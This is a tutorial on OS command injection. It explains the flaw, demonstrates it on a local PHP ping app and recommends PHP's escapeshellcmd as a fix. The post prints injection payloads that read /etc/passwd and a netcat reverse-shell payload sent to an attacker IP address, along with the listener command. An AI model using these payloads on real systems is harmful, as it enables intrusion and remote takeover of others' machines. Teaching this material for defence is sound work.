OS Command Injection
OS Command Injection (Shell Injection) is a security vulnerability that allows an attacker to execute an arbitrary command through a vulnerable endpoint. Command injection is executed by exploiting the host application operating system (OS) of a targeted device.
If a command injection point is found on a targeted endpoint, the injection of the malicious payload is easy. Commands used within this attack is straightforward, easy and commonly used while interacting with an OS.
Command injection vulnerability can also be leveraged to chain multiple attack vectors. This vulnerability enables an attacker to read and write sensitive files on the affected system without authentication and authorization. The attacker would obtain information such as source codes, usernames, passwords, financial statements and other critical data. The attacker can use the data in spiteful settings. Command injection vulnerability allows an attacker to inject malicious code on the affected endpoint to get advanced persistent and unauthorized access via reverse shell access. In various exploitation cases, command injection is used to compromise hosting infrastructures and exploit trust relationship to chain attacks on the other system present within the network domain of the vulnerable endpoint.
How does OS Command Injection occur?
OS command injection vulnerability is a result of improper input validation. The lack of proper user input sanitization leads to this vulnerability. In the command injection attack, payloads will be provided as input in the vulnerable fields of a targeted endpoint. Due to improper sanitization, the payload gets executed as a system command. The attacker would be executing any payload of their liking as the endpoint will now behave as a command-line interface and output the result specific to the provided input.
OS command injection is a critical vulnerability. This vulnerability could lead threat actors to gain complete control of the vulnerable server or machine. The attacker would be able to compromise the data and running services. Ultimately hindering the CIA triad of Information Security: Confidentiality, Integrity and Availability.
Useful Commands
OS commands are the input within the vulnerable fields to execute OS command injection. Some of the most common commands used to obtain system information of Linux and Windows-based platforms are:
Show Current User
- Linux: whoami
- Windows: whoami
Operating System Version
- Linux: uname -a
- Windows:ver
Network Configuration
- Linux: ifconfig
- Window: ipconfig/all
Network Connections
- Linux: netstat -an
- Windows: netstat -an
Running Processes
- Linux: ps -ef
- Windows: tasklist
Vulnerable Functions to OS Command Injection
The working of a web application is the main concern for a developer during the developer phase. If the security aspect is neglected, numerous vulnerabilities arise in a web application. These vulnerabilities enable threat actors to conduct exploitation to hamper the vulnerable endpoint. Multiple functions that perform system calls are the target for the threat actors as it executes OS commands as per the injected payload.
Some of the function vulnerable to OS command injection are
- exec()
- system()
- shell_exec()
- passthru()
- eval()
Demonstration of OS Command Injection
A local web application is deployed to mimic an OS command injection vulnerability. The web application aims to check the online status of the user-provided endpoint. The web application accepts domain name as an input and lists out the ping information.
For testing purpose, google.com is provided as an input
The web application performs ping scan and results the output. The output is similar to what we get while checking a connection in a Linux based command line interface.
Exploitation
As the obtained result was similar to a command line output, an OS command payload was injected. Along with the domain name, the pwd command was injected into the search field. pwd is a command used to obtain the current directory location. The web application provided the ping information along with the current directory information. Hence, it is verified that the web application is vulnerable to OS command injection.
Command: google.com; pwd
The OS command injection vulnerability lets the attackers execute any command with the current user privilege. In this example, the attacker was able to read the contents of the /etc/passwd file.
Command: google.com; cat ../../../../../../../etc/passwd
Getting Reverse Shell
The command injection can be used to gain a reverse shell access to the vulnerable machine. The reverse shell access would allow an attacker to execute remote-based arbitrary commands.
To get the reverse shell, we have the attacker IP address and the listening port address.
The attacker machine should enable listening to the specified port to obtain the reverse shell of the vulnerable system.
The IP address of the attacker machine is 192.168.163.132
Netcat (nc) was used to listen to the compromised machine from the attacker machine.
Command: nc -lvp 1234
l is to enable the listening mode;
v refers to the verbose
p is the local port number which in this case is 1234.
The attacker machine was listening on port 1234. The payload was then specified on the command injection vulnerable field to obtain the reverse shell.
Command: google.com; nc 192.168.163.132 1234 -e /bin/sh
/bin/sh is an executable that represents the system shell. In this scenario, the system shell of the vulnerable device is obtained in the attacker machine via reverse shell.
Upon execution of the reverse shell payload, the reverse shell access was gained in the attacker machine. The commands: whoami and pwd were executed that resulted in the same output as earlier code execution. The content of the /etc/passwd file was read via reverse shell access.
Code Analysis
Upon examining the code, the PHP program operates a shell_exec() function. This function executes the command via the shell interface. The output from this function is a string format result. The user input in this code is not filtered. In this code, the user input goes straight to the input of the shell_exec() function. The improper formatting of the user input lets the threat actors execute the OS command on the search field. The careful manipulation of the OS command use lets attack to obtain unauthorized access to the vulnerable endpoint and its data.
Mitigation
For mitigating the OS command injection vulnerability, the escapeshellcmd() function was used. escapeshellcmd() is a pre-build function in PHP that escapes any characters within a string that is used to trick a shell command to execute arbitrary commands. This function is best suitable to be used before function such as: shell_exec(), system() or exec().
The escapeshellcmd() escapes characters such as: (&#;`|*?~<>^()[]{}$\, \x0A and \xFF. ‘ and “). Due to this escape capability, it is best suitable to use this function to minimize arbitrary command injections. Most of the special character necessary will be escaped by this function.
Command Injection Property
Command injection was demonstrated from a web application perspective in the above example. However, command injection is not just limited to a web application. Any program or application that uses OS command can be vulnerable to command injection. Desktop application, web application, and command-line interface (CLI) tools can be used to execute command injection.
In this example, the command injection is executed via python programming. The os module in python executes OS commands from the programming code.
os.system() function takes the OS command as a parameter. The OS command must be within double-quotes.
It is possible to execute multiple commands separated by a semi-colon (;).
In this example, three commands were separated with semi-colon: ls, whoami and pwd.
Command: ls;whoami;pwd
Conclusion
OS command injection is a critical vulnerability which if exploited by attacker can lead to entire system compromise. This demonstration provides a step by step working of a threat actor in a situation where OS command injection is detected. A mitigation strategy is included such that the vulnerability can be easily patched. The practical demonstration of each component will provide a first-hand experience that can be imitated to learn about the presented vulnerability.
